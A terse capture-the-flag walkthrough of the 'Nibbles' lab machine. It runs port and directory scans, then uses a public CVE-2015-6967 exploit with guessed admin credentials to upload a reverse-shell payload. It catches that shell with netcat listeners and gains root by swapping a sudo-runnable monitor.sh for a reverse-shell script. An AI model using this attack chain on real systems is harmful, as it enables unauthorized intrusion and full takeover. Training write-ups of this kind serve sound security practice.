Ping
ping 10.10.10.75
Nmap default Scan
nmap 10.10.10.75 -oN dnmap
Nmap Script and Service Scan
nmap 10.10.10.75 -sC -sV -A -oN snmap
Nmap All Port Scan
nmap -p- --min-rate 10000 10.10.10.75 -sC -sV -A -oN anmap
No hidden ports.
On port 80
Nothing Interesting on the main page
On Source Code
So there must be something in /nibbleblog directory
On /nibbleblog
Coool…!
Gobuster Scan
gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster1.txt
Found some interesting directories.
On ffuf Scan
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.75/nibbleblog/FUZZ -t 100 -o ffuf.txt
Lets read README file
We got Version info
Will jump to Initial Foothold…!
Will Search for public Exploit.
Found one https://github.com/dix0nym/CVE-2015-6967
Will run the exploit accordingly
python3 exp.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload rev.php
Got shell
rlwrap nc -nvlp 443
Lets upgrade the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Found user.txt location
find / -type f -name "user.txt" 2>/dev/null
cd /home/nibbler
Got user.txt
Will jump to Privilege escalation…!
Will check our sudo privileges
sudo -l
Interesting…!
Lets check is there a file named monitor.sh or will create one
There a zip file
Will unzip it
unzip personal.zip
Got it…!
Will exploit this to escalate our Privileges
The original script
My permission on the file
ls -la
I have full permissions, so removed original script and replaced with my reverse shell script
cat monitor.sh
Now we can run this script as sudo
chmod +x monitor.sh
sudo ./monitor.sh
Set up listener to catch reverse shell
rlwrap nc -nvlp 443
Coool, got shell as root…!
Will get root.txt
I’m done with Nibbles…:)